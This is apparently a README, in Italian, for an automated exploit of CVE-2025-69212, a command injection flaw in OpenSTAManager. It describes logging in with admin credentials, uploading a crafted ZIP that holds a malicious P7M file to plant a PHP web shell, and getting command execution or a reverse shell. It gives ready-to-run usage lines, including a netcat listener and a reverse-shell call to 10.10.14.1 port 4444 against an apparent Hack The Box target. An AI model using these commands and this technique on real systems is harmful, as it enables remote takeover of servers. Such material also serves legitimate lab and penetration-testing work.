
Exploit automatizzato per la vulnerabilità CVE-2025-69212 di iniezione di comandi in OpenSTAManager, con autenticazione amministratore, caricamento di file ZIP dannosi ed esecuzione di una reverse shell o di comandi.
Uno script di exploit completamente automatizzato per CVE-2025-69212, una vulnerabilità di iniezione di comandi in OpenSTAManager. Questo script si autentica con le credenziali admin, distribuisce una shell web PHP dannosa tramite un file P7M modificato in un archivio ZIP e fornisce l'esecuzione di comandi o una reverse shell.
invoice.p7m).python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -r <LHOST> <LPORT>
Esempi:
Esegui un singolo comando:
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -c 'id'
Ottieni una reverse shell:
# Start your netcat listener in another terminal:
nc -lvnp 4444
# Run the exploit:
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -r 10.10.14.1 4444